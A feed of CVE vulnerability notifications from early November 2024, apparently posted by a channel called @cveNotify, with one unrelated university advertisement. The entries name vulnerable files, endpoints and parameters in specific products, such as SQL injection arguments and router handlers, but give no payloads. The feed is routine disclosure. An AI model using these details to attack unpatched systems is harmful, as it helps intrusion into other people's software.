🚨 CVE-2024-51425An issue in the WaterToken smart contract (which can be run on the Ethereum blockchain) allows remote attackers to have an unspecified impact. NOTE: this is disputed by third parties because the impact is limited to function calls.🎖@cveNotify |
|
| 2024-11-04 06:37:24 |
🚨 CVE-2024-51424An issue in the PepeGxng smart contract (which can be run on the Ethereum blockchain) allows remote attackers to have an unspecified impact via the Owned.setOwner function. NOTE: this is disputed by third parties because the impact is limited to function calls.🎖@cveNotify |
|
| 2024-11-04 05:37:24 |
🚨 CVE-2024-10760A vulnerability was found in code-projects University Event Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /dodelete.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-11-04 04:37:36 |
🚨 CVE-2024-10758A vulnerability, which was classified as critical, was found in code-projects/anirbandutta9 Content Management System and News-Buzz 1.0. This affects an unknown part of the file /index.php. The manipulation of the argument user_name leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. This product is distributed under two entirely different names.🎖@cveNotify |
|
| 2024-11-04 03:37:35 |
🚨 CVE-2024-10756A vulnerability classified as problematic was found in PHPGurukul Online Shopping Portal 2.0. Affected by this vulnerability is an unknown functionality of the file /admin/assets/plugins/DataTables/media/unit_testing/templates/html_table.php. The manipulation of the argument scripts leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-11-04 03:37:34 |
🚨 CVE-2024-10754A vulnerability was found in PHPGurukul Online Shopping Portal 2.0. It has been rated as problematic. This issue affects some unknown processing of the file /admin/assets/plugins/DataTables/media/unit_testing/templates/dymanic_table.php. The manipulation of the argument scripts leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-11-04 02:37:44 |
🚨 CVE-2024-20111In ccu, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS09065033; Issue ID: MSV-1754.🎖@cveNotify |
|
| 2024-11-04 02:37:38 |
🚨 CVE-2024-20110In ccu, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS09065887; Issue ID: MSV-1762.🎖@cveNotify |
|
| 2024-11-04 02:37:37 |
🚨 CVE-2024-20107In da, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS09124360; Issue ID: MSV-1823.🎖@cveNotify |
|
| 2024-11-04 02:37:36 |
🚨 CVE-2024-20106In m4u, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08960505; Issue ID: MSV-1590.🎖@cveNotify |
|
| 2024-11-04 02:37:32 |
🚨 CVE-2024-10753A vulnerability was found in PHPGurukul Online Shopping Portal 2.0. It has been declared as problematic. This vulnerability affects unknown code of the file admin/assets/plugins/DataTables/media/unit_testing/templates/dom_data_two_headers.php. The manipulation of the argument scripts leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-11-03 20:37:24 |
🚨 CVE-2024-10740A vulnerability, which was classified as critical, was found in code-projects E-Health Care System up to 1.0. This affects an unknown part of the file /Admin/consulting_detail.php. The manipulation of the argument consulting_id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-11-03 19:37:24 |
🚨 CVE-2024-1163The attacker may exploit a path traversal vulnerability leading to information disclosure.🎖@cveNotify |
|
| 2024-11-03 18:37:24 |
🚨 CVE-2024-10739A vulnerability, which was classified as critical, has been found in code-projects E-Health Care System 1.0. Affected by this issue is some unknown functionality of the file /Admin/adminlogin.php. The manipulation of the argument email/admin_pswd as part of String leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory only mentions the parameter "email" to be affected. But it must be assumed that parameter "admin_pswd" is affected as well.🎖@cveNotify |
|
| 2024-11-03 17:37:32 |
🚨 CVE-2024-4888BerriAI's litellm, in its latest version, is vulnerable to arbitrary file deletion due to improper input validation on the `/audio/transcriptions` endpoint. An attacker can exploit this vulnerability by sending a specially crafted request that includes a file path to the server, which then deletes the specified file without proper authorization or validation. This vulnerability is present in the code where `os.remove(file.filename)` is used to delete a file, allowing any user to delete critical files on the server such as SSH keys, SQLite databases, or configuration files.🎖@cveNotify |
|
| 2024-11-03 17:37:26 |
🚨 CVE-2024-3408man-group/dtale version 3.10.0 is vulnerable to an authentication bypass and remote code execution (RCE) due to improper input validation. The vulnerability arises from a hardcoded `SECRET_KEY` in the flask configuration, allowing attackers to forge a session cookie if authentication is enabled. Additionally, the application fails to properly restrict custom filter queries, enabling attackers to execute arbitrary code on the server by bypassing the restriction on the `/update-settings` endpoint, even when `enable_custom_filters` is not enabled. This vulnerability allows attackers to bypass authentication mechanisms and execute remote code on the server.🎖@cveNotify |
|
| 2024-11-03 17:37:25 |
🚨 CVE-2024-5127In lunary-ai/lunary versions 1.2.2 through 1.2.25, an improper access control vulnerability allows users on the Free plan to invite other members and assign them any role, including those intended for Paid and Enterprise plans only. This issue arises due to insufficient backend validation of roles and permissions, enabling unauthorized users to join a project and potentially exploit roles and permissions not intended for their use. The vulnerability specifically affects the Team feature, where the backend fails to validate whether a user has paid for a plan before allowing them to send invite links with any role assigned. This could lead to unauthorized access and manipulation of project settings or data.🎖@cveNotify |
|
| 2024-11-03 17:37:24 |
🚨 CVE-2024-3033An improper authorization vulnerability exists in the mintplex-labs/anything-llm application, specifically within the '/api/v/' endpoint and its sub-routes. This flaw allows unauthenticated users to perform destructive actions on the VectorDB, including resetting the database and deleting specific namespaces, without requiring any authorization or permissions. The issue affects all versions up to and including the latest version, with a fix introduced in version 1.0.0. Exploitation of this vulnerability can lead to complete data loss of document embeddings across all workspaces, rendering workspace chats and embeddable chat widgets non-functional. Additionally, attackers can list all namespaces, potentially exposing private workspace names.🎖@cveNotify |
|
| 2024-11-03 15:37:25 |
🚨 CVE-2024-10737A vulnerability classified as critical has been found in Codezips Free Exam Hall Seating Management System 1.0. Affected is an unknown function of the file /teacher.php. The manipulation of the argument email leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-11-03 15:37:24 |
🚨 CVE-2024-10736A vulnerability was found in Codezips Free Exam Hall Seating Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /student.php. The manipulation of the argument email leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-11-03 14:37:24 |
🚨 CVE-2024-10735A vulnerability was found in Project Worlds Life Insurance Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /editNominee.php. The manipulation of the argument nominee_id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-11-03 13:37:24 |
🚨 CVE-2024-10734A vulnerability was found in Project Worlds Life Insurance Management System 1.0. It has been classified as critical. This affects an unknown part of the file /editPayment.php. The manipulation of the argument recipt_no leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-11-03 12:37:24 |
🚨 CVE-2024-10733A vulnerability was found in code-projects Restaurant Order System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /login.php. The manipulation of the argument uid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-11-03 11:37:24 |
🚨 CVE-2024-10732A vulnerability has been found in Tongda OA 2017 up to 11.10 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /module/word_model/view/index.php. The manipulation of the argument query_str leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-11-03 10:37:24 |
🚨 CVE-2024-10731A vulnerability, which was classified as critical, was found in Tongda OA up to 11.10. Affected is an unknown function of the file /pda/appcenter/check_seal.php. The manipulation of the argument ID leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-11-03 09:37:24 |
🚨 CVE-2024-10730A vulnerability, which was classified as critical, has been found in Tongda OA up to 11.6. This issue affects some unknown processing of the file /pda/appcenter/web_show.php. The manipulation of the argument ID leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-11-03 06:32:21 |
The Open Doors Olympiad is your gateway to a captivating realm of knowledge and academic excellence!Seize this remarkable opportunity to participate in the online tour of the Olympiad and secure a free education at one of Russia's most prestigious universities. You will be able to choose a programm and study Russian language for a year before entering. This is your chance to become a true specialist, equipped with skills and expertise to thrive in your field.Registrations for Open Doors are now open — visit the website to learn more! Unlock your potential and become a part of this extraordinary academic adventure! |
Images
|
| 2024-11-02 19:37:24 |
🚨 CVE-2024-7081A vulnerability was found in itsourcecode Tailoring Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file expcatadd.php. The manipulation of the argument id/title leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-11-02 18:37:25 |
🚨 CVE-2024-10702A vulnerability classified as critical has been found in code-projects Simple Car Rental System 1.0. Affected is an unknown function of the file /signup.php. The manipulation of the argument fname leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-11-02 18:37:24 |
🚨 CVE-2024-10701A vulnerability was found in PHPGurukul Car Rental Portal 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /search.php. The manipulation of the argument searchdata leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-11-02 16:37:24 |
🚨 CVE-2024-10700A vulnerability was found in code-projects University Event Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file submit.php. The manipulation of the argument name/email/title/Year/gender/fromdate/todate/people leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory only mentions the parameter "name" to be affected. But it must be assumed that a variety of other parameters is affected too.🎖@cveNotify |
|
| 2024-11-02 15:37:24 |
🚨 CVE-2024-10699A vulnerability was found in code-projects Wazifa System 1.0. It has been classified as critical. This affects an unknown part of the file /controllers/logincontrol.php. The manipulation of the argument username leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-11-02 14:37:24 |
🚨 CVE-2024-10698A vulnerability was found in Tenda AC6 15.03.05.19 and classified as critical. Affected by this issue is the function formSetDeviceName of the file /goform/SetOnlineDevName. The manipulation of the argument devName leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-11-02 12:37:24 |
🚨 CVE-2024-10697A vulnerability has been found in Tenda AC6 15.03.05.19 and classified as critical. Affected by this vulnerability is the function formWriteFacMac of the file /goform/WriteFacMac of the component API Endpoint. The manipulation of the argument The leads to command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-11-02 08:37:24 |
🚨 CVE-2024-9896The BBP Core – Expand bbPress powered forums with useful features plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.2.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-11-02 06:37:24 |
🚨 CVE-2024-51774qBittorrent before 5.0.1 proceeds with use of https URLs even after certificate validation errors.🎖@cveNotify |
|
| 2024-11-02 02:37:25 |
🚨 CVE-2024-8739The ReCaptcha Integration for WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.2.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-11-02 02:37:24 |
🚨 CVE-2024-10310The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Custom Gallery Widget 'image_title' parameter in all versions up to, and including, 5.10.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-11-01 22:37:24 |
🚨 CVE-2024-9191The Okta Device Access features, provided by the Okta Verify agent for Windows, provides access to the OktaDeviceAccessPipe, which enables attackers in a compromised device to retrieve passwords associated with Desktop MFA passwordless logins. The vulnerability was discovered via routine penetration testing.Note: A precondition of this vulnerability is that the user must be using the Okta Device Access passwordless feature. Okta Device Access users not using passwordless are not affected, and customers only using Okta Verify on platforms other than Windows, or only using FastPass are not affected.🎖@cveNotify |
|
| 2024-11-01 21:37:32 |
🚨 CVE-2024-44159A path deletion vulnerability was addressed by preventing vulnerable code from running with privileges. This issue is fixed in macOS Ventura 13.7.1, macOS Sonoma 14.7.1. An app may be able to bypass Privacy preferences.🎖@cveNotify |
|
| 2024-11-01 21:37:26 |
🚨 CVE-2024-37879Improper input validation in /admin/config/save in User-friendly SVN (USVN) before v1.0.12 and below allows administrators to execute arbitrary code via the fields "siteTitle", "siteIco" and "siteLogo".🎖@cveNotify |
|
| 2024-11-01 21:37:25 |
🚨 CVE-2024-23269A downgrade issue affecting Intel-based Mac computers was addressed with additional code-signing restrictions. This issue is fixed in macOS Sonoma 14.4, macOS Monterey 12.7.4, macOS Ventura 13.6.5. An app may be able to modify protected parts of the file system.🎖@cveNotify |
|
| 2024-11-01 21:37:24 |
🚨 CVE-2024-25559URL spoofing vulnerability exists in a-blog cms Ver.3.1.0 to Ver.3.1.8. If an attacker sends a specially crafted request, the administrator of the product may be forced to access an arbitrary website when clicking a link in the audit log.🎖@cveNotify |
|
| 2024-11-01 21:07:30 |
🚨 CVE-2024-10561A vulnerability was found in Codezips Pet Shop Management System 1.0. It has been classified as critical. This affects an unknown part of the file birdsupdate.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-11-01 21:07:29 |
🚨 CVE-2024-10559A vulnerability was found in SourceCodester Airport Booking Management System 1.0 and classified as critical. Affected by this issue is the function details of the component Passport Number Handler. The manipulation leads to buffer overflow. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-11-01 21:07:26 |
🚨 CVE-2024-10556A vulnerability, which was classified as critical, was found in Codezips Pet Shop Management System 1.0. Affected is an unknown function of the file birdsadd.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-11-01 21:07:25 |
🚨 CVE-2024-6673A Cross-Site Request Forgery (CSRF) vulnerability exists in the `install_comfyui` endpoint of the `lollms_comfyui.py` file in the parisneo/lollms-webui repository, versions v9.9 to the latest. The endpoint uses the GET method without requiring a client ID, allowing an attacker to trick a victim into installing ComfyUI. If the victim's device does not have sufficient capacity, this can result in a crash.🎖@cveNotify |
|
| 2024-11-01 21:07:24 |
🚨 CVE-2024-47121The goTenna Pro App uses a weak password for sharing encryption keys via the key broadcast method. If the broadcasted encryption key is captured over RF, and password is cracked via brute force attack, it is possible to decrypt it and use it to decrypt all future and past messages sent via encrypted broadcast with that particular key. This only applies when the key is broadcasted over RF. This is an optional feature, so it is recommended to use local QR encryption key sharing for additional security on this and previous versions.🎖@cveNotify |
|
| 2024-11-01 20:37:44 |
🚨 CVE-2024-49972In the Linux kernel, the following vulnerability has been resolved:drm/amd/display: Deallocate DML memory if allocation fails[Why]When DC state create DML memory allocation fails, memory is notdeallocated subsequently, resulting in uninitialized structurethat is not NULL.[How]Deallocate memory if DML memory allocation fails.🎖@cveNotify |
|
| 2024-11-01 20:37:43 |
🚨 CVE-2024-26330An issue was discovered in Kape CyberGhostVPN 8.4.3.12823 on Windows. After a successful logout, user credentials remain in memory while the process is still open, and can be obtained by dumping the process memory and parsing it.🎖@cveNotify |
|
| 2024-11-01 20:37:42 |
🚨 CVE-2024-28061An issue was discovered in Apiris Kafeo 6.4.4. It permits a bypass, of the protection in place, to access to the data stored in the embedded database file.🎖@cveNotify |
|
| 2024-11-01 20:37:38 |
🚨 CVE-2024-3231The Popup4Phone WordPress plugin through 1.3.2 does not sanitise and escape some parameters, which could allow unauthenticated users to perform Cross-Site Scripting attacks against admins.🎖@cveNotify |
|
| 2024-11-01 20:37:37 |
🚨 CVE-2024-34090An issue was discovered in Archer Platform 6 before 2024.04. There is a stored cross-site scripting (XSS) vulnerability. The login banner in the Archer Control Panel (ACP) did not previously escape content appropriately. 6.14 P3 (6.14.0.3) is also a fixed release.🎖@cveNotify |
|
| 2024-11-01 20:37:32 |
🚨 CVE-2024-27706Cross Site Scripting vulnerability in Huly Platform v.0.6.202 allows attackers to execute arbitrary code via upload of crafted SVG file to issues.🎖@cveNotify |
|
| 2024-11-01 20:07:25 |
🚨 CVE-2024-20482A vulnerability in the web-based management interface of Cisco Secure Firewall Management Center (FMC) Software, formerly Firepower Management Center Software, could allow an authenticated, remote attacker to elevate privileges on an affected device. To exploit this vulnerability, an attacker must have a valid account on the device that is configured with a custom read-only role. This vulnerability is due to insufficient validation of role permissions in part of the web-based management interface. An attacker could exploit this vulnerability by performing a write operation on the affected part of the web-based management interface. A successful exploit could allow the attacker to modify certain parts of the configuration.🎖@cveNotify |
|
| 2024-11-01 20:07:24 |
🚨 CVE-2024-49971In the Linux kernel, the following vulnerability has been resolved:drm/amd/display: Increase array size of dummy_boolean[WHY]dml2_core_shared_mode_support and dml_core_mode_support access the thirdelement of dummy_boolean, i.e. hw_debug5 = &s->dummy_boolean[2], whendummy_boolean has size of 2. Any assignment to hw_debug5 causes anOVERRUN.[HOW]Increase dummy_boolean's array size to 3.This fixes 2 OVERRUN issues reported by Coverity.🎖@cveNotify |
|
| 2024-11-01 19:37:44 |
🚨 CVE-2024-49400Tacquito prior to commit 07b49d1358e6ec0b5aa482fcd284f509191119e2 was not properly performing regex matches on authorized commands and arguments. Configured allowed commands/arguments were intended to require a match on the entire string, but instead only enforced a match on a sub-string. That would have potentially allowed unauthorized commands to be executed.🎖@cveNotify |
|
| 2024-11-01 19:37:43 |
🚨 CVE-2024-35970In the Linux kernel, the following vulnerability has been resolved:af_unix: Clear stale u->oob_skb.syzkaller started to report deadlock of unix_gc_lock after commit4090fa373f0e ("af_unix: Replace garbage collection algorithm."), butit just uncovers the bug that has been there since commit 314001f0bf92("af_unix: Add OOB support").The repro basically does the following. from socket import * from array import array c1, c2 = socketpair(AF_UNIX, SOCK_STREAM) c1.sendmsg([b'a'], [(SOL_SOCKET, SCM_RIGHTS, array("i", [c2.fileno()]))], MSG_OOB) c2.recv(1) # blocked as no normal data in recv queue c2.close() # done async and unblock recv() c1.close() # done async and trigger GCA socket sends its file descriptor to itself as OOB data and tries toreceive normal data, but finally recv() fails due to async close().The problem here is wrong handling of OOB skb in manage_oob(). Whenrecvmsg() is called without MSG_OOB, manage_oob() is called to checkif the peeked skb is OOB skb. In such a case, manage_oob() pops itout of the receive queue but does not clear unix_sock(sk)->oob_skb.This is wrong in terms of uAPI.Let's say we send "hello" with MSG_OOB, and "world" without MSG_OOB.The 'o' is handled as OOB data. When recv() is called twice withoutMSG_OOB, the OOB data should be lost. >>> from socket import * >>> c1, c2 = socketpair(AF_UNIX, SOCK_STREAM, 0) >>> c1.send(b'hello', MSG_OOB) # 'o' is OOB data 5 >>> c1.send(b'world') 5 >>> c2.recv(5) # OOB data is not received b'hell' >>> c2.recv(5) # OOB date is skipped b'world' >>> c2.recv(5, MSG_OOB) # This should return an error b'o'In the same situation, TCP actually returns -EINVAL for the lastrecv().Also, if we do not clear unix_sk(sk)->oob_skb, unix_poll() always setEPOLLPRI even though the data has passed through by previous recv().To avoid these issues, we must clear unix_sk(sk)->oob_skb when dequeuingit from recv queue.The reason why the old GC did not trigger the deadlock is because theold GC relied on the receive queue to detect the loop.When it is triggered, the socket with OOB data is marked as GC candidatebecause file refcount == inflight count (1). However, after traversingall inflight sockets, the socket still has a positive inflight count (1),thus the socket is excluded from candidates. Then, the old GC lose thechance to garbage-collect the socket.With the old GC, the repro continues to create true garbage that willnever be freed nor detected by kmemleak as it's linked to the globalinflight list. That's why we couldn't even notice the issue.🎖@cveNotify |
|
| 2024-11-01 19:37:38 |
🚨 CVE-2024-34528WordOps through 3.20.0 has a wo/cli/plugins/stack_pref.py TOCTOU race condition because the conf_path os.open does not use a mode parameter during file creation.🎖@cveNotify |
|
| 2024-11-01 19:37:37 |
🚨 CVE-2023-52551Vulnerability of data verification errors in the kernel module.Impact: Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2024-11-01 19:37:32 |
🚨 CVE-2024-25080WebMail in Axigen 10.x before 10.3.3.62 allows XSS via the image attachment viewer.🎖@cveNotify |
|
| 2024-11-01 19:37:31 |
🚨 CVE-2024-1290The User Registration WordPress plugin before 2.12 does not prevent users with at least the contributor role from rendering sensitive shortcodes, allowing them to generate, and leak, valid password reset URLs, which they can use to take over any accounts.🎖@cveNotify |
|
| 2024-11-01 19:37:26 |
🚨 CVE-2024-28823Amazon AWS aws-js-s3-explorer (aka AWS JavaScript S3 Explorer) 1.0.0 allows XSS via a crafted S3 bucket name to index.html.🎖@cveNotify |
|
| 2024-11-01 18:07:25 |
🚨 CVE-2024-10093A vulnerability, which was classified as critical, was found in VSO ConvertXtoDvd 7.0.0.83. Affected is an unknown function in the library avcodec.dll of the file ConvertXtoDvd.exe. The manipulation leads to uncontrolled search path. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-11-01 17:07:25 |
🚨 CVE-2024-10446A vulnerability classified as critical has been found in Project Worlds Online Time Table Generator 1.0. Affected is an unknown function of the file /timetable/admin/admindashboard.php?info=add_course. The manipulation of the argument c leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-11-01 17:07:24 |
🚨 CVE-2024-49974In the Linux kernel, the following vulnerability has been resolved:NFSD: Limit the number of concurrent async COPY operationsNothing appears to limit the number of concurrent async COPYoperations that clients can start. In addition, AFAICT each asyncCOPY can copy an unlimited number of 4MB chunks, so can run for along time. Thus IMO async COPY can become a DoS vector.Add a restriction mechanism that bounds the number of concurrentbackground COPY operations. Start simple and try to be fair -- thispatch implements a per-namespace limit.An async COPY request that occurs while this limit is exceeded getsNFS4ERR_DELAY. The requesting client can choose to send the requestagain after a delay or fall back to a traditional read/write stylecopy.If there is need to make the mechanism more sophisticated, we canvisit that in future patches.🎖@cveNotify |
|
| 2024-11-01 16:37:25 |
🚨 CVE-2022-38176An issue was discovered in YSoft SAFEQ 6 before 6.0.72. Incorrect privileges were configured as part of the installer package for the Client V3 services, allowing for local user privilege escalation by overwriting the executable file via an alternative data stream. NOTE: this is not the same as CVE-2021-31859.🎖@cveNotify |
|
| 2024-11-01 16:07:25 |
🚨 CVE-2024-50006In the Linux kernel, the following vulnerability has been resolved:ext4: fix i_data_sem unlock order in ext4_ind_migrate()Fuzzing reports a possible deadlock in jbd2_log_wait_commit.This issue is triggered when an EXT4_IOC_MIGRATE ioctl is set to requiresynchronous updates because the file descriptor is opened with O_SYNC.This can lead to the jbd2_journal_stop() function callingjbd2_might_wait_for_commit(), potentially causing a deadlock if theEXT4_IOC_MIGRATE call races with a write(2) system call.This problem only arises when CONFIG_PROVE_LOCKING is enabled. In thiscase, the jbd2_might_wait_for_commit macro locks jbd2_handle in thejbd2_journal_stop function while i_data_sem is locked. This triggerslockdep because the jbd2_journal_start function might also lock the samejbd2_handle simultaneously.Found by Linux Verification Center (linuxtesting.org) with syzkaller.Rule: add🎖@cveNotify |
|
| 2024-11-01 15:37:25 |
🚨 CVE-2023-52380Vulnerability of improper access control in the email module.Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2024-11-01 15:07:31 |
🚨 CVE-2024-4005The Social Pixel WordPress plugin through 2.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-11-01 15:07:30 |
🚨 CVE-2023-52177Missing Authorization vulnerability in SoftLab Integrate Google Drive.This issue affects Integrate Google Drive: from n/a through 1.3.3.🎖@cveNotify |
|
| 2024-11-01 15:07:27 |
🚨 CVE-2024-33564Missing Authorization vulnerability in 8theme XStore.This issue affects XStore: from n/a through 9.3.8.🎖@cveNotify |
|
| 2024-11-01 15:07:26 |
🚨 CVE-2024-33561Missing Authorization vulnerability in 8theme XStore.This issue affects XStore: from n/a through 9.3.8.🎖@cveNotify |
|
| 2024-11-01 15:07:25 |
🚨 CVE-2024-33547Missing Authorization vulnerability in AA-Team WZone.This issue affects WZone: from n/a through 14.0.10.🎖@cveNotify |
|
| 2024-11-01 14:37:40 |
🚨 CVE-2024-8691A vulnerability in the GlobalProtect portal in Palo Alto Networks PAN-OS software enables a malicious authenticated GlobalProtect user to impersonate another GlobalProtect user. Active GlobalProtect users impersonated by an attacker who is exploiting this vulnerability are disconnected from GlobalProtect. Upon exploitation, PAN-OS logs indicate that the impersonated user authenticated to GlobalProtect, which hides the identity of the attacker.🎖@cveNotify |
|
| 2024-11-01 14:37:36 |
🚨 CVE-2024-37476Cross Site Scripting (XSS) vulnerability in Automattic Newspack Campaigns allows Stored XSS.This issue affects Newspack Campaigns: from n/a through 2.31.1.🎖@cveNotify |
|
| 2024-11-01 14:37:35 |
🚨 CVE-2024-33543Missing Authorization vulnerability in CodePeople WP Time Slots Booking Form.This issue affects WP Time Slots Booking Form: from n/a through 1.2.06.🎖@cveNotify |
|
| 2024-11-01 14:37:31 |
🚨 CVE-2024-31273Missing Authorization vulnerability in JS Help Desk JS Help Desk – Best Help Desk & Support Plugin.This issue affects JS Help Desk – Best Help Desk & Support Plugin: from n/a through 2.8.3.🎖@cveNotify |
|
| 2024-11-01 14:37:30 |
🚨 CVE-2024-5342The Simple Image Popup Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sips_popup' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-11-01 14:37:29 |
🚨 CVE-2021-47498In the Linux kernel, the following vulnerability has been resolved:dm rq: don't queue request to blk-mq during DM suspendDM uses blk-mq's quiesce/unquiesce to stop/start device mapper queue.But blk-mq's unquiesce may come from outside events, such as elevatorswitch, updating nr_requests or others, and request may come duringsuspend, so simply ask for blk-mq to requeue it.Fixes one kernel panic issue when running updating nr_requests anddm-mpath suspend/resume stress test.🎖@cveNotify |
|
| 2024-11-01 14:07:32 |
🚨 CVE-2024-10282A vulnerability classified as critical was found in Tenda RX9 and RX9 Pro 22.03.02.10/22.03.02.20. Affected by this vulnerability is the function sub_42EA38 of the file /goform/SetVirtualServerCfg. The manipulation of the argument list leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-11-01 14:07:26 |
🚨 CVE-2024-10281A vulnerability classified as critical has been found in Tenda RX9 and RX9 Pro 22.03.02.10/22.03.02.20. Affected is the function sub_42EEE0 of the file /goform/SetStaticRouteCfg. The manipulation of the argument list leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-11-01 14:07:25 |
🚨 CVE-2024-5770The WP Force SSL & HTTPS SSL Redirect plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ajax_save_setting' function in versions up to, and including, 1.66. This makes it possible for authenticated attackers, subscriber-level permissions and above, to update the plugin settings.🎖@cveNotify |
|
| 2024-11-01 14:07:24 |
🚨 CVE-2024-0444GStreamer AV1 Video Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GStreamer. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation.The specific flaw exists within the parsing of tile list data within AV1-encoded video files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-22873.🎖@cveNotify |
|
| 2024-11-01 13:37:25 |
🚨 CVE-2024-35750Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in wpdevart Responsive Image Gallery, Gallery Album.This issue affects Responsive Image Gallery, Gallery Album: from n/a through 2.0.3.🎖@cveNotify |
|
| 2024-11-01 13:37:24 |
🚨 CVE-2024-5654The CF7 Google Sheets Connector plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'execute_post_data_cg7_free' function in all versions up to, and including, 5.0.9. This makes it possible for unauthenticated attackers to toggle site configuration settings, including WP_DEBUG, WP_DEBUG_LOG, SCRIPT_DEBUG, and SAVEQUERIES.🎖@cveNotify |
|
| 2024-11-01 13:07:37 |
🚨 CVE-2019-25219Asio C++ Library before 1.13.0 lacks a fallback error code in the case of SSL_ERROR_SYSCALL with no associated error information from the SSL library being used.🎖@cveNotify |
|
| 2024-11-01 13:07:32 |
